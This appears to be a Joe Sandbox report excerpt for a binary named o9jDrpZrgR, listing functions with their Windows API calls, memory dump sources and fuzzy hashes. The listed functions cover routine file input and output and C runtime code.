API String ID: 1431749950-3493335439
Opcode ID: b322d1f528fa1bdd5a5fbecc991afe898af12a22f842629bc77ebcace4aca069
Instruction ID: b54f7d9614c3806904d8f5839c9438921c0a97664209929a4018ce4f69f76276
Opcode Fuzzy Hash: b322d1f528fa1bdd5a5fbecc991afe898af12a22f842629bc77ebcace4aca069
Instruction Fuzzy Hash: 68F0E5B2404328ABCF213F9CDC06BFA7B5CFF14B89B080411BD85E6351E6B48940EAB5

Uniqueness

Uniqueness Score: -1.00%

Function 00889785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00889795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008897AD
GetLastError.KERNEL32 ref: 008897DF
GetLastError.KERNEL32 ref: 008897FE

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: b7ee1e0c216c3300616a024a73217ea08dfb53aecc5939f7e828fb11e13b2b95
Instruction ID: f697708b068375b4dd5e4ea33af894ee40d253dd81eed2d1bcab9266791034a6
Opcode Fuzzy Hash: b7ee1e0c216c3300616a024a73217ea08dfb53aecc5939f7e828fb11e13b2b95
Instruction Fuzzy Hash: 81118E30914609EBDF207F64CC04A7937A9FF42724F188A39F496C5190E7749E44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 008AAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0088D710,00000000,00000000,?,008AACDB,0088D710,00000000,00000000,00000000,?,008AAED8,00000006,FlsSetValue), ref: 008AAD66
GetLastError.KERNEL32(?,008AACDB,0088D710,00000000,00000000,00000000,?,008AAED8,00000006,FlsSetValue,008B7970,FlsSetValue,00000000,00000364,?,008A98B7), ref: 008AAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008AACDB,0088D710,00000000,00000000,00000000,?,008AAED8,00000006,FlsSetValue,008B7970,FlsSetValue,00000000), ref: 008AAD80

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 70345552d086edff0f85835e34ad87f5f7c53989bf2c0b194b9891d475a1b341
Instruction ID: e89af49b64ed266961fce1d85a9f54dd8267541e0d27801d6cfebe281fe8ab7a
Opcode Fuzzy Hash: 70345552d086edff0f85835e34ad87f5f7c53989bf2c0b194b9891d475a1b341
Instruction Fuzzy Hash: 54012B36201736AFD7264B68DC44A577B98FF467A37110720F946E7D60D721D801C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00889F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0088D343,00000001,?,?,?,00000000,0089551D,?,?,?), ref: 00889F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0089551D,?,?,?,?,?,00894FC7,?), ref: 00889FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0088D343,00000001,?,?), ref: 0088A011

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: d260612fe692cd0d7646cdfa2afa679bf97227b8daf25a4670466b607d0be01d
Instruction ID: 812ebaef0ef73039ffd4abcc097ebbd19961762dabe1fed5ed851632cd6a6d0d
Opcode Fuzzy Hash: d260612fe692cd0d7646cdfa2afa679bf97227b8daf25a4670466b607d0be01d
Instruction Fuzzy Hash: EB319E31208309EFEB18AF24D918B7A77A5FF84715F044619F981DB2D0CB75AD48CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0088A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0088C27E: _wcslen.LIBCMT ref: 0088C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A30C
GetLastError.KERNEL32(?,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A329

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: b7730b2fa87c4deace6cac091c1bedf650171ea923d3b2d3e7328e5feb6e95e0
Instruction ID: 2a916257ade260f191b4bfef4dfde01c1730f31bf7ca696912a3618d348469fc
Opcode Fuzzy Hash: b7730b2fa87c4deace6cac091c1bedf650171ea923d3b2d3e7328e5feb6e95e0
Instruction Fuzzy Hash: CF01B131200614AAFF2ABB794C09BFE3748FF0A781F044416F901E62D1DB64CA8287B7

Uniqueness

Uniqueness Score: -1.00%

Function 008AB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008AB8B8

Strings

, xrefs: 008AB8FD

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 76fefa7034c1f56ae8c73301693d633136dc2f301fd3c35d43ad85eec665d41e
Instruction ID: 1136613ac13d9d0d8bc18e409cf183c70c14a53a0ef17629956bbcef23178195
Opcode Fuzzy Hash: 76fefa7034c1f56ae8c73301693d633136dc2f301fd3c35d43ad85eec665d41e
Instruction Fuzzy Hash: A241FB7050425C9EEB218E28CC84BF7BBA9FB46308F1804EDD59AC6543E335AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008AAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 008AAFDD

Strings

LCMapStringEx, xrefs: 008AAF7D, 008AAF87

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 9ecfbb5c0b00ee5c1c5cd54c8547fe08ae4b5911955c7dcf515ee5ff55a222e7
Instruction ID: 656462f013d48cb08252272f53a5bead824e93a9521c6dbfe1eae595d8ab7c8d
Opcode Fuzzy Hash: 9ecfbb5c0b00ee5c1c5cd54c8547fe08ae4b5911955c7dcf515ee5ff55a222e7
Instruction Fuzzy Hash: 79012932504209BBDF165FA0DC05DEE7F62FF49750F054254FE24A5260CB368A31EB81

Uniqueness

Uniqueness Score: -1.00%

Function 008AAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008AA56F), ref: 008AAF55

Strings

InitializeCriticalSectionEx, xrefs: 008AAF1B, 008AAF25

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 6c27ef6c634331b6a7805196e76a6588a803047b3ae2039d2610a25c2fbcc9e9
Instruction ID: de9331568bcff3a61742c0922afa6c87c6825e49f1f3794be7eb6e7e602ad9c8
Opcode Fuzzy Hash: 6c27ef6c634331b6a7805196e76a6588a803047b3ae2039d2610a25c2fbcc9e9
Instruction Fuzzy Hash: D7F09A31645208BFDB1A6F54CC06CAEBF61FF45B21B004164F918EA360DA365A10DB86

Uniqueness

Uniqueness Score: -1.00%

Function 008AADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 008AADEE

Strings

FlsAlloc, xrefs: 008AADC0, 008AADCA

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 565e4d8db53c5c0a26deae7de201e9928db8a8d7d2ecb5615ce30d17266ea8c9
Instruction ID: 868073b7057d63e5bd573b7183ae70c8104030aa169b0e6f8d057c16a58b2a0d
Opcode Fuzzy Hash: 565e4d8db53c5c0a26deae7de201e9928db8a8d7d2ecb5615ce30d17266ea8c9
Instruction Fuzzy Hash: 2AE05530680308BBE625AB28CC029AEBF54FB85721B0102A8F800E3740CE785E0082CA

Uniqueness

Uniqueness Score: -1.00%

Function 0089EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089EAF9

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Strings

3So, xrefs: 0089EAE7, 0089EAF3

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3So
API String ID: 1269201914-1105799393
Opcode ID: ba5444fd6e3e97622330e0bb8c426330aa2a365c936899567fe329ca2150f3b9
Instruction ID: f84b2ee6dfd366e4bb5544eac0bb560373ca2412defc0c5b636cd7abbb32a1a3
Opcode Fuzzy Hash: ba5444fd6e3e97622330e0bb8c426330aa2a365c936899567fe329ca2150f3b9
Instruction Fuzzy Hash: 88B012C62AA4967D3904F2861D06C37070CF1F2BA0334843EF510D4191EC800C090432

Uniqueness

Uniqueness Score: -1.00%

Function 008ABBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 008AB7BB: GetOEMCP.KERNEL32(00000000,?,?,008ABA44,?), ref: 008AB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008ABA89,?,00000000), ref: 008ABC64
GetCPInfo.KERNEL32(00000000,008ABA89,?,?,?,008ABA89,?,00000000), ref: 008ABC77

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 7270e33f784ddda0dd4bd92240baf1b3806a53bb7068ba9d8e591605bbb35db6
Instruction ID: f5a905dde5093113e6ec6783333da020eeca2bf530b2e526e4eedc30eb88c64b
Opcode Fuzzy Hash: 7270e33f784ddda0dd4bd92240baf1b3806a53bb7068ba9d8e591605bbb35db6
Instruction Fuzzy Hash: 37512370A002499FFB209F75C881ABABBE4FF43314F18406ED496CBA53DB3999458B90

Uniqueness

Uniqueness Score: -1.00%

Function 00889A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00889A50,?,?,00000000,?,?,00888CBC,?), ref: 00889BAB
GetLastError.KERNEL32(?,00000000,00888411,-00009570,00000000,000007F3), ref: 00889BB6

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: c8fcbc37cab0f001144e193e846ff7ee9d4b6599d7ce9c6d5f099557389d683d
Instruction ID: 799dacf2723fcb1e11c01015d494a070bb660b79e8127648151c440e203ac7de
Opcode Fuzzy Hash: c8fcbc37cab0f001144e193e846ff7ee9d4b6599d7ce9c6d5f099557389d683d
Instruction Fuzzy Hash: 3E4189316043658FDB24AF29E58487AB7E6FF94320F188A2DE8C1C3260E770AD458B91

Uniqueness

Uniqueness Score: -1.00%

Function 008ABA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 008A97E5: GetLastError.KERNEL32(?,008C1030,008A4674,008C1030,?,?,008A3F73,00000050,?,008C1030,00000200), ref: 008A97E9
Part of subcall function 008A97E5: _free.LIBCMT ref: 008A981C
Part of subcall function 008A97E5: SetLastError.KERNEL32(00000000,?,008C1030,00000200), ref: 008A985D
Part of subcall function 008A97E5: _abort.LIBCMT ref: 008A9863

Part of subcall function 008ABB4E: _abort.LIBCMT ref: 008ABB80
Part of subcall function 008ABB4E: _free.LIBCMT ref: 008ABBB4

Part of subcall function 008AB7BB: GetOEMCP.KERNEL32(00000000,?,?,008ABA44,?), ref: 008AB7E6

_free.LIBCMT ref: 008ABA9F
_free.LIBCMT ref: 008ABAD5

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: c1fa5a2e478710739a5d9f6bad6134f02953e3efd4601f70dc3d70ff2d17cac9
Instruction ID: 792134673ad819dbd596e47b5211065e384e0701d7b2064c8c622cb34279858a
Opcode Fuzzy Hash: c1fa5a2e478710739a5d9f6bad6134f02953e3efd4601f70dc3d70ff2d17cac9
Instruction Fuzzy Hash: 6C31B331904219AFFB10DFA8D441B9977F5FF42320F214199E504DB6A3EB72AD41DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00881E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00881E55

Part of subcall function 00883BBA: __EH_prolog.LIBCMT ref: 00883BBF

_wcslen.LIBCMT ref: 00881EFD

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 67c476feb79eefc6ffde94d0b92ced8a6706813b27a083f3e14b306eff684f53
Instruction ID: 522e3a0d2ed400f1dbb4d89520fa37962df6f54dca3a260a93cd85173f39206d
Opcode Fuzzy Hash: 67c476feb79eefc6ffde94d0b92ced8a6706813b27a083f3e14b306eff684f53
Instruction Fuzzy Hash: 42313671904209AECF11EF98C949AEEBBFAFF18310F1000AAF845E7251CB325E11CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00889DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008873BC,?,?,?,00000000), ref: 00889DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00889E70

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: aa5baacc9ab22b75f16a682dea942a14e258175430bc3b5c52a3e80fd3f7422c
Instruction ID: 140f6e357faee3c1a96e3083866257bcdaa15259238488885d45c81101edc2f2
Opcode Fuzzy Hash: aa5baacc9ab22b75f16a682dea942a14e258175430bc3b5c52a3e80fd3f7422c
Instruction Fuzzy Hash: 8021BD31248246EBCB14EA68C895ABABBE8FF95304F0C495CF4C5C7541D329E90D9B62

Uniqueness

Uniqueness Score: -1.00%

Function 0088966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00889F27,?,?,0088771A), ref: 008896E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00889F27,?,?,0088771A), ref: 00889716

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: db9c0ceb48a1771db56a0b6b07a7c610263463d2b0b96caf67cc3ca7faf927ee
Instruction ID: ce6bd1c0838b90ad1ea1f4e6c719d23c8647d200665847adf4c8f7cb3cc811d9
Opcode Fuzzy Hash: db9c0ceb48a1771db56a0b6b07a7c610263463d2b0b96caf67cc3ca7faf927ee
Instruction Fuzzy Hash: 9121C1711447446FE370AA69CC89BB777DCFB59324F180A19F9D5C21D1D774A8848731

Uniqueness

Uniqueness Score: -1.00%

Function 00889E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00889EC7
GetLastError.KERNEL32 ref: 00889ED4

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: c19968261ff47623d70e0d1fe3b9334079ef7385b31fc66c839146ff24c3e8f5
Instruction ID: c24a1dd0ee222b321738bbf3824bb1dd6bd9e0431831b5173b5b428b471d9f18
Opcode Fuzzy Hash: c19968261ff47623d70e0d1fe3b9334079ef7385b31fc66c839146ff24c3e8f5
Instruction Fuzzy Hash: 5211E530600704ABD734E628C885BB6BBE9FF45370F544A69E592D26D0D7B0ED49C760

Uniqueness

Uniqueness Score: -1.00%

Function 008A8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008A8E75

